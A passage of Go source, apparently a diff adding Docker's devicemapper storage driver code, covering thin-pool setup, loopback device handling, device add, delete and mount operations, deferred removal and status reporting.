fmt.Errorf("devmapper: Error saving transaction metadata: %s", err) + } + return nil +} + +func (devices *DeviceSet) closeTransaction() error { + if err := devices.updatePoolTransactionID(); err != nil { + logrus.Debug("devmapper: Failed to close Transaction") + return err + } + return nil +} + +func determineDriverCapabilities(version string) error { + /* + * Driver version 4.27.0 and greater support deferred activation + * feature. + */ + + logrus.Debugf("devicemapper: driver version is %s", version) + + versionSplit := strings.Split(version, ".") + major, err := strconv.Atoi(versionSplit[0]) + if err != nil { + return graphdriver.ErrNotSupported + } + + if major > 4 { + driverDeferredRemovalSupport = true + return nil + } + + if major < 4 { + return nil + } + + minor, err := strconv.Atoi(versionSplit[1]) + if err != nil { + return graphdriver.ErrNotSupported + } + + /* + * If major is 4 and minor is 27, then there is no need to + * check for patch level as it can not be less than 0. + */ + if minor >= 27 { + driverDeferredRemovalSupport = true + return nil + } + + return nil +} + +// Determine the major and minor number of loopback device +func getDeviceMajorMinor(file *os.File) (uint64, uint64, error) { + stat, err := file.Stat() + if err != nil { + return 0, 0, err + } + + dev := stat.Sys().(*syscall.Stat_t).Rdev + majorNum := major(dev) + minorNum := minor(dev) + + logrus.Debugf("devmapper: Major:Minor for device: %s is:%v:%v", file.Name(), majorNum, minorNum) + return majorNum, minorNum, nil +} + +// Given a file which is backing file of a loop back device, find the +// loopback device name and its major/minor number. +func getLoopFileDeviceMajMin(filename string) (string, uint64, uint64, error) { + file, err := os.Open(filename) + if err != nil { + logrus.Debugf("devmapper: Failed to open file %s", filename) + return "", 0, 0, err + } + + defer file.Close() + loopbackDevice := loopback.FindLoopDeviceFor(file) + if loopbackDevice == nil { + return "", 0, 0, fmt.Errorf("devmapper: Unable to find loopback mount for: %s", filename) + } + defer loopbackDevice.Close() + + Major, Minor, err := getDeviceMajorMinor(loopbackDevice) + if err != nil { + return "", 0, 0, err + } + return loopbackDevice.Name(), Major, Minor, nil +} + +// Get the major/minor numbers of thin pool data and metadata devices +func (devices *DeviceSet) getThinPoolDataMetaMajMin() (uint64, uint64, uint64, uint64, error) { + var params, poolDataMajMin, poolMetadataMajMin string + + _, _, _, params, err := devicemapper.GetTable(devices.getPoolName()) + if err != nil { + return 0, 0, 0, 0, err + } + + if _, err = fmt.Sscanf(params, "%s %s", &poolMetadataMajMin, &poolDataMajMin); err != nil { + return 0, 0, 0, 0, err + } + + logrus.Debugf("devmapper: poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin) + + poolDataMajMinorSplit := strings.Split(poolDataMajMin, ":") + poolDataMajor, err := strconv.ParseUint(poolDataMajMinorSplit[0], 10, 32) + if err != nil { + return 0, 0, 0, 0, err + } + + poolDataMinor, err := strconv.ParseUint(poolDataMajMinorSplit[1], 10, 32) + if err != nil { + return 0, 0, 0, 0, err + } + + poolMetadataMajMinorSplit := strings.Split(poolMetadataMajMin, ":") + poolMetadataMajor, err := strconv.ParseUint(poolMetadataMajMinorSplit[0], 10, 32) + if err != nil { + return 0, 0, 0, 0, err + } + + poolMetadataMinor, err := strconv.ParseUint(poolMetadataMajMinorSplit[1], 10, 32) + if err != nil { + return 0, 0, 0, 0, err + } + + return poolDataMajor, poolDataMinor, poolMetadataMajor, poolMetadataMinor, nil +} + +func (devices *DeviceSet) loadThinPoolLoopBackInfo() error { + poolDataMajor, poolDataMinor, poolMetadataMajor, poolMetadataMinor, err := devices.getThinPoolDataMetaMajMin() + if err != nil { + return err + } + + dirname := devices.loopbackDir() + + // data device has not been passed in. So there should be a data file + // which is being mounted as loop device. + if devices.dataDevice == "" { + datafilename := path.Join(dirname, "data") + dataLoopDevice, dataMajor, dataMinor, err := getLoopFileDeviceMajMin(datafilename) + if err != nil { + return err + } + + // Compare the two + if poolDataMajor == dataMajor && poolDataMinor == dataMinor { + devices.dataDevice = dataLoopDevice + devices.dataLoopFile = datafilename + } + + } + + // metadata device has not been passed in. So there should be a + // metadata file which is being mounted as loop device. + if devices.metadataDevice == "" { + metadatafilename := path.Join(dirname, "metadata") + metadataLoopDevice, metadataMajor, metadataMinor, err := getLoopFileDeviceMajMin(metadatafilename) + if err != nil { + return err + } + if poolMetadataMajor == metadataMajor && poolMetadataMinor == metadataMinor { + devices.metadataDevice = metadataLoopDevice + devices.metadataLoopFile = metadatafilename + } + } + + return nil +} + +func (devices *DeviceSet) enableDeferredRemovalDeletion() error { + + // If user asked for deferred removal then check both libdm library + // and kernel driver support deferred removal otherwise error out. + if enableDeferredRemoval { + if !driverDeferredRemovalSupport { + return fmt.Errorf("devmapper: Deferred removal can not be enabled as kernel does not support it") + } + if !devicemapper.LibraryDeferredRemovalSupport { + return fmt.Errorf("devmapper: Deferred removal can not be enabled as libdm does not support it") + } + logrus.Debug("devmapper: Deferred removal support enabled.") + devices.deferredRemove = true + } + + if enableDeferredDeletion { + if !devices.deferredRemove { + return fmt.Errorf("devmapper: Deferred deletion can not be enabled as deferred removal is not enabled. Enable deferred removal using --storage-opt dm.use_deferred_removal=true parameter") + } + logrus.Debug("devmapper: Deferred deletion support enabled.") + devices.deferredDelete = true + } + return nil +} + +func (devices *DeviceSet) initDevmapper(doInit bool) error { + // give ourselves to libdm as a log handler + devicemapper.LogInit(devices) + + version, err := devicemapper.GetDriverVersion() + if err != nil { + // Can't even get driver version, assume not supported + return graphdriver.ErrNotSupported + } + + if err := determineDriverCapabilities(version); err != nil { + return graphdriver.ErrNotSupported + } + + if err := devices.enableDeferredRemovalDeletion(); err != nil { + return err + } + + // https://github.com/docker/docker/issues/4036 + if supported := devicemapper.UdevSetSyncSupport(true); !supported { + if dockerversion.IAmStatic == "true" { + logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option") + } else { + logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option") + } + + if !devices.overrideUdevSyncCheck { + return graphdriver.ErrNotSupported + } + } + + //create the root dir of the devmapper driver ownership to match this + //daemon's remapped root uid/gid so containers can start properly + uid, gid, err := idtools.GetRootUIDGID(devices.uidMaps, devices.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAs(devices.root, 0700, uid, gid); err != nil && !os.IsExist(err) { + return err + } + if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil && !os.IsExist(err) { + return err + } + + // Set the device prefix from the device id and inode of the docker root dir + + st, err := os.Stat(devices.root) + if err != nil { + return fmt.Errorf("devmapper: Error looking up dir %s: %s", devices.root, err) + } + sysSt := st.Sys().(*syscall.Stat_t) + // "reg-" stands for "regular file". + // In the future we might use "dev-" for "device file", etc. + // docker-maj,min[-inode] stands for: + // - Managed by docker + // - The target of this device is at major and minor + // - If is defined, use that file inside the device as a loopback image. Otherwise use the device itself. + devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(sysSt.Dev), minor(sysSt.Dev), sysSt.Ino) + logrus.Debugf("devmapper: Generated prefix: %s", devices.devicePrefix) + + // Check for the existence of the thin-pool device + poolExists, err := devices.thinPoolExists(devices.getPoolName()) + if err != nil { + return err + } + + // It seems libdevmapper opens this without O_CLOEXEC, and go exec will not close files + // that are not Close-on-exec, + // so we add this badhack to make sure it closes itself + setCloseOnExec("/dev/mapper/control") + + // Make sure the sparse images exist in /devicemapper/data and + // /devicemapper/metadata + + createdLoopback := false + + // If the pool doesn't exist, create it + if !poolExists && devices.thinPoolDevice == "" { + logrus.Debug("devmapper: Pool doesn't exist. Creating it.") + + var ( + dataFile *os.File + metadataFile *os.File + ) + + if devices.dataDevice == "" { + // Make sure the sparse images exist in /devicemapper/data + + hasData := devices.hasImage("data") + + if !doInit && !hasData { + return errors.New("loopback data file not found") + } + + if !hasData { + createdLoopback = true + } + + data, err := devices.ensureImage("data", devices.dataLoopbackSize) + if err != nil { + logrus.Debugf("devmapper: Error device ensureImage (data): %s", err) + return err + } + + dataFile, err = loopback.AttachLoopDevice(data) + if err != nil { + return err + } + devices.dataLoopFile = data + devices.dataDevice = dataFile.Name() + } else { + dataFile, err = os.OpenFile(devices.dataDevice, os.O_RDWR, 0600) + if err != nil { + return err + } + } + defer dataFile.Close() + + if devices.metadataDevice == "" { + // Make sure the sparse images exist in /devicemapper/metadata + + hasMetadata := devices.hasImage("metadata") + + if !doInit && !hasMetadata { + return errors.New("loopback metadata file not found") + } + + if !hasMetadata { + createdLoopback = true + } + + metadata, err := devices.ensureImage("metadata", devices.metaDataLoopbackSize) + if err != nil { + logrus.Debugf("devmapper: Error device ensureImage (metadata): %s", err) + return err + } + + metadataFile, err = loopback.AttachLoopDevice(metadata) + if err != nil { + return err + } + devices.metadataLoopFile = metadata + devices.metadataDevice = metadataFile.Name() + } else { + metadataFile, err = os.OpenFile(devices.metadataDevice, os.O_RDWR, 0600) + if err != nil { + return err + } + } + defer metadataFile.Close() + + if err := devicemapper.CreatePool(devices.getPoolName(), dataFile, metadataFile, devices.thinpBlockSize); err != nil { + return err + } + } + + // Pool already exists and caller did not pass us a pool. That means + // we probably created pool earlier and could not remove it as some + // containers were still using it. Detect some of the properties of + // pool, like is it using loop devices. + if poolExists && devices.thinPoolDevice == "" { + if err := devices.loadThinPoolLoopBackInfo(); err != nil { + logrus.Debugf("devmapper: Failed to load thin pool loopback device information:%v", err) + return err + } + } + + // If we didn't just create the data or metadata image, we need to + // load the transaction id and migrate old metadata + if !createdLoopback { + if err := devices.initMetaData(); err != nil { + return err + } + } + + if devices.thinPoolDevice == "" { + if devices.metadataLoopFile != "" || devices.dataLoopFile != "" { + logrus.Warn("devmapper: Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man docker` to refer to dm.thinpooldev section.") + } + } + + // Right now this loads only NextDeviceID. If there is more metadata + // down the line, we might have to move it earlier. + if err := devices.loadDeviceSetMetaData(); err != nil { + return err + } + + // Setup the base image + if doInit { + if err := devices.setupBaseImage(); err != nil { + logrus.Debugf("devmapper: Error device setupBaseImage: %s", err) + return err + } + } + + return nil +} + +// AddDevice adds a device and registers in the hash. +func (devices *DeviceSet) AddDevice(hash, baseHash string, storageOpt map[string]string) error { + logrus.Debugf("devmapper: AddDevice START(hash=%s basehash=%s)", hash, baseHash) + defer logrus.Debugf("devmapper: AddDevice END(hash=%s basehash=%s)", hash, baseHash) + + // If a deleted device exists, return error. + baseInfo, err := devices.lookupDeviceWithLock(baseHash) + if err != nil { + return err + } + + if baseInfo.Deleted { + return fmt.Errorf("devmapper: Base device %v has been marked for deferred deletion", baseInfo.Hash) + } + + baseInfo.lock.Lock() + defer baseInfo.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + // Also include deleted devices in case hash of new device is + // same as one of the deleted devices. + if info, _ := devices.lookupDevice(hash); info != nil { + return fmt.Errorf("devmapper: device %s already exists. Deleted=%v", hash, info.Deleted) + } + + size, err := devices.parseStorageOpt(storageOpt) + if err != nil { + return err + } + + if size == 0 { + size = baseInfo.Size + } + + if size < baseInfo.Size { + return fmt.Errorf("devmapper: Container size cannot be smaller than %s", units.HumanSize(float64(baseInfo.Size))) + } + + if err := devices.takeSnapshot(hash, baseInfo, size); err != nil { + return err + } + + // Grow the container rootfs. + if size > baseInfo.Size { + info, err := devices.lookupDevice(hash) + if err != nil { + return err + } + + if err := devices.growFS(info); err != nil { + return err + } + } + + return nil +} + +func (devices *DeviceSet) parseStorageOpt(storageOpt map[string]string) (uint64, error) { + + // Read size to change the block device size per container. + for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return 0, err + } + return uint64(size), nil + default: + return 0, fmt.Errorf("Unknown option %s", key) + } + } + + return 0, nil +} + +func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error { + // If device is already in deleted state, there is nothing to be done. + if info.Deleted { + return nil + } + + logrus.Debugf("devmapper: Marking device %s for deferred deletion.", info.Hash) + + info.Deleted = true + + // save device metadata to reflect deleted state. + if err := devices.saveMetadata(info); err != nil { + info.Deleted = false + return err + } + + devices.nrDeletedDevices++ + return nil +} + +// Should be called with devices.Lock() held. +func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) error { + if err := devices.openTransaction(info.Hash, info.DeviceID); err != nil { + logrus.Debugf("devmapper: Error opening transaction hash = %s deviceId = %d", "", info.DeviceID) + return err + } + + defer devices.closeTransaction() + + err := devicemapper.DeleteDevice(devices.getPoolDevName(), info.DeviceID) + if err != nil { + // If syncDelete is true, we want to return error. If deferred + // deletion is not enabled, we return an error. If error is + // something other then EBUSY, return an error. + if syncDelete || !devices.deferredDelete || err != devicemapper.ErrBusy { + logrus.Debugf("devmapper: Error deleting device: %s", err) + return err + } + } + + if err == nil { + if err := devices.unregisterDevice(info.DeviceID, info.Hash); err != nil { + return err + } + // If device was already in deferred delete state that means + // deletion was being tried again later. Reduce the deleted + // device count. + if info.Deleted { + devices.nrDeletedDevices-- + } + devices.markDeviceIDFree(info.DeviceID) + } else { + if err := devices.markForDeferredDeletion(info); err != nil { + return err + } + } + + return nil +} + +// Issue discard only if device open count is zero. +func (devices *DeviceSet) issueDiscard(info *devInfo) error { + logrus.Debugf("devmapper: issueDiscard START(device: %s).", info.Hash) + defer logrus.Debugf("devmapper: issueDiscard END(device: %s).", info.Hash) + // This is a workaround for the kernel not discarding block so + // on the thin pool when we remove a thinp device, so we do it + // manually. + // Even if device is deferred deleted, activate it and issue + // discards. + if err := devices.activateDeviceIfNeeded(info, true); err != nil { + return err + } + + devinfo, err := devicemapper.GetInfo(info.Name()) + if err != nil { + return err + } + + if devinfo.OpenCount != 0 { + logrus.Debugf("devmapper: Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount) + return nil + } + + if err := devicemapper.BlockDeviceDiscard(info.DevName()); err != nil { + logrus.Debugf("devmapper: Error discarding block on device: %s (ignoring)", err) + } + return nil +} + +// Should be called with devices.Lock() held. +func (devices *DeviceSet) deleteDevice(info *devInfo, syncDelete bool) error { + if devices.doBlkDiscard { + devices.issueDiscard(info) + } + + // Try to deactivate device in case it is active. + if err := devices.deactivateDevice(info); err != nil { + logrus.Debugf("devmapper: Error deactivating device: %s", err) + return err + } + + if err := devices.deleteTransaction(info, syncDelete); err != nil { + return err + } + + return nil +} + +// DeleteDevice will return success if device has been marked for deferred +// removal. If one wants to override that and want DeleteDevice() to fail if +// device was busy and could not be deleted, set syncDelete=true. +func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error { + logrus.Debugf("devmapper: DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete) + defer logrus.Debugf("devmapper: DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete) + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return err + } + + info.lock.Lock() + defer info.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + return devices.deleteDevice(info, syncDelete) +} + +func (devices *DeviceSet) deactivatePool() error { + logrus.Debug("devmapper: deactivatePool() START") + defer logrus.Debug("devmapper: deactivatePool() END") + devname := devices.getPoolDevName() + + devinfo, err := devicemapper.GetInfo(devname) + if err != nil { + return err + } + + if devinfo.Exists == 0 { + return nil + } + if err := devicemapper.RemoveDevice(devname); err != nil { + return err + } + + if d, err := devicemapper.GetDeps(devname); err == nil { + logrus.Warnf("devmapper: device %s still has %d active dependents", devname, d.Count) + } + + return nil +} + +func (devices *DeviceSet) deactivateDevice(info *devInfo) error { + logrus.Debugf("devmapper: deactivateDevice START(%s)", info.Hash) + defer logrus.Debugf("devmapper: deactivateDevice END(%s)", info.Hash) + + devinfo, err := devicemapper.GetInfo(info.Name()) + if err != nil { + return err + } + + if devinfo.Exists == 0 { + return nil + } + + if devices.deferredRemove { + if err := devicemapper.RemoveDeviceDeferred(info.Name()); err != nil { + return err + } + } else { + if err := devices.removeDevice(info.Name()); err != nil { + return err + } + } + return nil +} + +// Issues the underlying dm remove operation. +func (devices *DeviceSet) removeDevice(devname string) error { + var err error + + logrus.Debugf("devmapper: removeDevice START(%s)", devname) + defer logrus.Debugf("devmapper: removeDevice END(%s)", devname) + + for i := 0; i < 200; i++ { + err = devicemapper.RemoveDevice(devname) + if err == nil { + break + } + if err != devicemapper.ErrBusy { + return err + } + + // If we see EBUSY it may be a transient error, + // sleep a bit a retry a few times. + devices.Unlock() + time.Sleep(100 * time.Millisecond) + devices.Lock() + } + + return err +} + +func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error { + if !devices.deferredRemove { + return nil + } + + logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded START(%s)", info.Name()) + defer logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded END(%s)", info.Name()) + + devinfo, err := devicemapper.GetInfoWithDeferred(info.Name()) + if err != nil { + return err + } + + if devinfo != nil && devinfo.DeferredRemove == 0 { + return nil + } + + // Cancel deferred remove + if err := devices.cancelDeferredRemoval(info); err != nil { + // If Error is ErrEnxio. Device is probably already gone. Continue. + if err != devicemapper.ErrEnxio { + return err + } + } + return nil +} + +func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error { + logrus.Debugf("devmapper: cancelDeferredRemoval START(%s)", info.Name()) + defer logrus.Debugf("devmapper: cancelDeferredRemoval END(%s)", info.Name()) + + var err error + + // Cancel deferred remove + for i := 0; i < 100; i++ { + err = devicemapper.CancelDeferredRemove(info.Name()) + if err != nil { + if err == devicemapper.ErrBusy { + // If we see EBUSY it may be a transient error, + // sleep a bit a retry a few times. + devices.Unlock() + time.Sleep(100 * time.Millisecond) + devices.Lock() + continue + } + } + break + } + return err +} + +// Shutdown shuts down the device by unmounting the root. +func (devices *DeviceSet) Shutdown(home string) error { + logrus.Debugf("devmapper: [deviceset %s] Shutdown()", devices.devicePrefix) + logrus.Debugf("devmapper: Shutting down DeviceSet: %s", devices.root) + defer logrus.Debugf("devmapper: [deviceset %s] Shutdown() END", devices.devicePrefix) + + // Stop deletion worker. This should start delivering new events to + // ticker channel. That means no new instance of cleanupDeletedDevice() + // will run after this call. If one instance is already running at + // the time of the call, it must be holding devices.Lock() and + // we will block on this lock till cleanup function exits. + devices.deletionWorkerTicker.Stop() + + devices.Lock() + // Save DeviceSet Metadata first. Docker kills all threads if they + // don't finish in certain time. It is possible that Shutdown() + // routine does not finish in time as we loop trying to deactivate + // some devices while these are busy. In that case shutdown() routine + // will be killed and we will not get a chance to save deviceset + // metadata. Hence save this early before trying to deactivate devices. + devices.saveDeviceSetMetaData() + + // ignore the error since it's just a best effort to not try to unmount something that's mounted + mounts, _ := mount.GetMounts() + mounted := make(map[string]bool, len(mounts)) + for _, mnt := range mounts { + mounted[mnt.Mountpoint] = true + } + + if err := filepath.Walk(path.Join(home, "mnt"), func(p string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if !info.IsDir() { + return nil + } + + if mounted[p] { + // We use MNT_DETACH here in case it is still busy in some running + // container. This means it'll go away from the global scope directly, + // and the device will be released when that container dies. + if err := syscall.Unmount(p, syscall.MNT_DETACH); err != nil { + logrus.Debugf("devmapper: Shutdown unmounting %s, error: %s", p, err) + } + } + + if devInfo, err := devices.lookupDevice(path.Base(p)); err != nil { + logrus.Debugf("devmapper: Shutdown lookup device %s, error: %s", path.Base(p), err) + } else { + if err := devices.deactivateDevice(devInfo); err != nil { + logrus.Debugf("devmapper: Shutdown deactivate %s , error: %s", devInfo.Hash, err) + } + } + + return nil + }); err != nil && !os.IsNotExist(err) { + devices.Unlock() + return err + } + + devices.Unlock() + + info, _ := devices.lookupDeviceWithLock("") + if info != nil { + info.lock.Lock() + devices.Lock() + if err := devices.deactivateDevice(info); err != nil { + logrus.Debugf("devmapper: Shutdown deactivate base , error: %s", err) + } + devices.Unlock() + info.lock.Unlock() + } + + devices.Lock() + if devices.thinPoolDevice == "" { + if err := devices.deactivatePool(); err != nil { + logrus.Debugf("devmapper: Shutdown deactivate pool , error: %s", err) + } + } + devices.Unlock() + + return nil +} + +// Recent XFS changes allow changing behavior of filesystem in case of errors. +// When thin pool gets full and XFS gets ENOSPC error, currently it tries +// IO infinitely and sometimes it can block the container process +// and process can't be killWith 0 value, XFS will not retry upon error +// and instead will shutdown filesystem. + +func (devices *DeviceSet) xfsSetNospaceRetries(info *devInfo) error { + dmDevicePath, err := os.Readlink(info.DevName()) + if err != nil { + return fmt.Errorf("devmapper: readlink failed for device %v:%v", info.DevName(), err) + } + + dmDeviceName := path.Base(dmDevicePath) + filePath := "/sys/fs/xfs/" + dmDeviceName + "/error/metadata/ENOSPC/max_retries" + maxRetriesFile, err := os.OpenFile(filePath, os.O_WRONLY, 0) + if err != nil { + return fmt.Errorf("devmapper: user specified daemon option dm.xfs_nospace_max_retries but it does not seem to be supported on this system :%v", err) + } + defer maxRetriesFile.Close() + + // Set max retries to 0 + _, err = maxRetriesFile.WriteString(devices.xfsNospaceRetries) + if err != nil { + return fmt.Errorf("devmapper: Failed to write string %v to file %v:%v", devices.xfsNospaceRetries, filePath, err) + } + return nil +} + +// MountDevice mounts the device if not already mounted. +func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error { + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return err + } + + if info.Deleted { + return fmt.Errorf("devmapper: Can't mount device %v as it has been marked for deferred deletion", info.Hash) + } + + info.lock.Lock() + defer info.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + if err := devices.activateDeviceIfNeeded(info, false); err != nil { + return fmt.Errorf("devmapper: Error activating devmapper device for '%s': %s", hash, err) + } + + fstype, err := ProbeFsType(info.DevName()) + if err != nil { + return err + } + + options := "" + + if fstype == "xfs" { + // XFS needs nouuid or it can't mount filesystems with the same fs + options = joinMountOptions(options, "nouuid") + } + + options = joinMountOptions(options, devices.mountOptions) + options = joinMountOptions(options, label.FormatMountLabel("", mountLabel)) + + if err := mount.Mount(info.DevName(), path, fstype, options); err != nil { + return fmt.Errorf("devmapper: Error mounting '%s' on '%s': %s", info.DevName(), path, err) + } + + if fstype == "xfs" && devices.xfsNospaceRetries != "" { + if err := devices.xfsSetNospaceRetries(info); err != nil { + syscall.Unmount(path, syscall.MNT_DETACH) + devices.deactivateDevice(info) + return err + } + } + + return nil +} + +// UnmountDevice unmounts the device and removes it from hash. +func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error { + logrus.Debugf("devmapper: UnmountDevice START(hash=%s)", hash) + defer logrus.Debugf("devmapper: UnmountDevice END(hash=%s)", hash) + + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return err + } + + info.lock.Lock() + defer info.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + logrus.Debugf("devmapper: Unmount(%s)", mountPath) + if err := syscall.Unmount(mountPath, syscall.MNT_DETACH); err != nil { + return err + } + logrus.Debug("devmapper: Unmount done") + + if err := devices.deactivateDevice(info); err != nil { + return err + } + + return nil +} + +// HasDevice returns true if the device metadata exists. +func (devices *DeviceSet) HasDevice(hash string) bool { + info, _ := devices.lookupDeviceWithLock(hash) + return info != nil +} + +// List returns a list of device ids. +func (devices *DeviceSet) List() []string { + devices.Lock() + defer devices.Unlock() + + ids := make([]string, len(devices.Devices)) + i := 0 + for k := range devices.Devices { + ids[i] = k + i++ + } + return ids +} + +func (devices *DeviceSet) deviceStatus(devName string) (sizeInSectors, mappedSectors, highestMappedSector uint64, err error) { + var params string + _, sizeInSectors, _, params, err = devicemapper.GetStatus(devName) + if err != nil { + return + } + if _, err = fmt.Sscanf(params, "%d %d", &mappedSectors, &highestMappedSector); err == nil { + return + } + return +} + +// GetDeviceStatus provides size, mapped sectors +func (devices *DeviceSet) GetDeviceStatus(hash string) (*DevStatus, error) { + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return nil, err + } + + info.lock.Lock() + defer info.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + status := &DevStatus{ + DeviceID: info.DeviceID, + Size: info.Size, + TransactionID: info.TransactionID, + } + + if err := devices.activateDeviceIfNeeded(info, false); err != nil { + return nil, fmt.Errorf("devmapper: Error activating devmapper device for '%s': %s", hash, err) + } + + sizeInSectors, mappedSectors, highestMappedSector, err := devices.deviceStatus(info.DevName()) + + if err != nil { + return nil, err + } + + status.SizeInSectors = sizeInSectors + status.MappedSectors = mappedSectors + status.HighestMappedSector = highestMappedSector + + return status, nil +} + +func (devices *DeviceSet) poolStatus() (totalSizeInSectors, transactionID, dataUsed, dataTotal, metadataUsed, metadataTotal uint64, err error) { + var params string + if _, totalSizeInSectors, _, params, err = devicemapper.GetStatus(devices.getPoolName()); err == nil { + _, err = fmt.Sscanf(params, "%d %d/%d %d/%d", &transactionID, &metadataUsed, &metadataTotal, &dataUsed, &dataTotal) + } + return +} + +// DataDevicePath returns the path to the data storage for this deviceset, +// regardless of loopback or block device +func (devices *DeviceSet) DataDevicePath() string { + return devices.dataDevice +} + +// MetadataDevicePath returns the path to the metadata storage for this deviceset, +// regardless of loopback or block device +func (devices *DeviceSet) MetadataDevicePath() string { + return devices.metadataDevice +} + +func (devices *DeviceSet) getUnderlyingAvailableSpace(loopFile string) (uint64, error) { + buf := new(syscall.Statfs_t) + if err := syscall.Statfs(loopFile, buf); err != nil { + logrus.Warnf("devmapper: Couldn't stat loopfile filesystem %v: %v", loopFile, err) + return 0, err + } + return buf.Bfree * uint64(buf.Bsize), nil +} + +func (devices *DeviceSet) isRealFile(loopFile string) (bool, error) { + if loopFile != "" { + fi, err := os.Stat(loopFile) + if err != nil { + logrus.Warnf("devmapper: Couldn't stat loopfile %v: %v", loopFile, err) + return false, err + } + return fi.Mode().IsRegular(), nil + } + return false, nil +} + +// Status returns the current status of this deviceset +func (devices *DeviceSet) Status() *Status { + devices.Lock() + defer devices.Unlock() + + status := &Status{} + + status.PoolName = devices.getPoolName() + status.DataFile = devices.DataDevicePath() + status.DataLoopback = devices.dataLoopFile + status.MetadataFile = devices.MetadataDevicePath() + status.MetadataLoopback = devices.metadataLoopFile + status.UdevSyncSupported = devicemapper.UdevSyncSupported() + status.DeferredRemoveEnabled = devices.deferredRemove + status.DeferredDeleteEnabled = devices.deferredDelete + status.DeferredDeletedDeviceCount = devices.nrDeletedDevices + status.BaseDeviceSize = devices.getBaseDeviceSize() + status.BaseDeviceFS = devices.getBaseDeviceFS() + + totalSizeInSectors, _, dataUsed, dataTotal, metadataUsed, metadataTotal, err := devices.poolStatus() + if err == nil { + // Convert from blocks to bytes + blockSizeInSectors := totalSizeInSectors / dataTotal + + status.Data.Used = dataUsed * blockSizeInSectors * 512 + status.Data.Total = dataTotal * blockSizeInSectors * 512 + status.Data.Available = status.Data.Total - status.Data.Used + + // metadata blocks are always 4k + status.Metadata.Used = metadataUsed * 4096 + status.Metadata.Total = metadataTotal * 4096 + status.Metadata.Available = status.Metadata.Total - status.Metadata.Used + + status.SectorSize = blockSizeInSectors * 512 + + if check, _ := devices.isRealFile(devices.dataLoopFile); check { + actualSpace, err := devices.getUnderlyingAvailableSpace(devices.dataLoopFile) + if err == nil && actualSpace < status.Data.Available { + status.Data.Available = actualSpace + } + } + + if check, _ := devices.isRealFile(devices.metadataLoopFile); check { + actualSpace, err := devices.getUnderlyingAvailableSpace(devices.metadataLoopFile) + if err == nil && actualSpace < status.Metadata.Available { + status.Metadata.Available = actualSpace + } + } + + minFreeData := (dataTotal * uint64(devices.minFreeSpacePercent)) / 100 + status.MinFreeSpace = minFreeData * blockSizeInSectors * 512 + } + + return status +} + +// Status returns the current status of this deviceset +func (devices *DeviceSet) exportDeviceMetadata(hash string) (*deviceMetadata, error) { + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return nil, err + } + + info.lock.Lock() + defer info.lock.Unlock() + + metadata := &deviceMetadata{info.DeviceID, info.Size, info.Name()} + return metadata, nil +} + +// NewDeviceSet creates the device set based on the options provided. +func NewDeviceSet(root string, doInit bool, options []string, uidMaps, gidMaps []idtools.IDMap) (*DeviceSet, error) { + devicemapper.SetDevDir("/dev") + + devices := &DeviceSet{ + root: root, + metaData: metaData{Devices: make(map[string]*devInfo)}, + dataLoopbackSize: defaultDataLoopbackSize, + metaDataLoopbackSize: defaultMetaDataLoopbackSize, + baseFsSize: defaultBaseFsSize, + overrideUdevSyncCheck: defaultUdevSyncOverride, + doBlkDiscard: true, + thinpBlockSize: defaultThinpBlockSize, + deviceIDMap: make([]byte, deviceIDMapSz), + deletionWorkerTicker: time.NewTicker(time.Second * 30), + uidMaps: uidMaps, + gidMaps: gidMaps, + minFreeSpacePercent: defaultMinFreeSpacePercent, + } + + foundBlkDiscard := false + for _, option := range options { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return nil, err + } + key = strings.ToLower(key) + switch key { + case "dm.basesize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + userBaseSize = true + devices.baseFsSize = uint64(size) + case "dm.loopdatasize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + devices.dataLoopbackSize = size + case "dm.loopmetadatasize": + size, err := units.RAMInBytes(val) + if err != nil { + return nil, err + } + devices.metaDataLoopbackSize = size + case "dm.fs": + if val != "ext4" && val != "xfs" { + return nil, fmt.Errorf("devmapper: Unsupported filesystem %s\n", val) + } + devices.filesystem = val + case "dm.mkfsarg": + devices.mkfsArgs = append(devices.mkfsArgs, val) + case "dm.mountopt": + devices.mountOptions = joinMountOptions(devices.mountOptions, val) + case "dm.metadatadev": + devices.metadataDevice = val + case "dm.datadev": + devices.dataDevice = val + case "dm.thinpooldev": + devices.thinPoolDevice = strings.TrimPrefix(val, "/dev/mapper/") + case "dm.blkdiscard": + foundBlkDiscard = true + devices.doBlkDiscard, err = 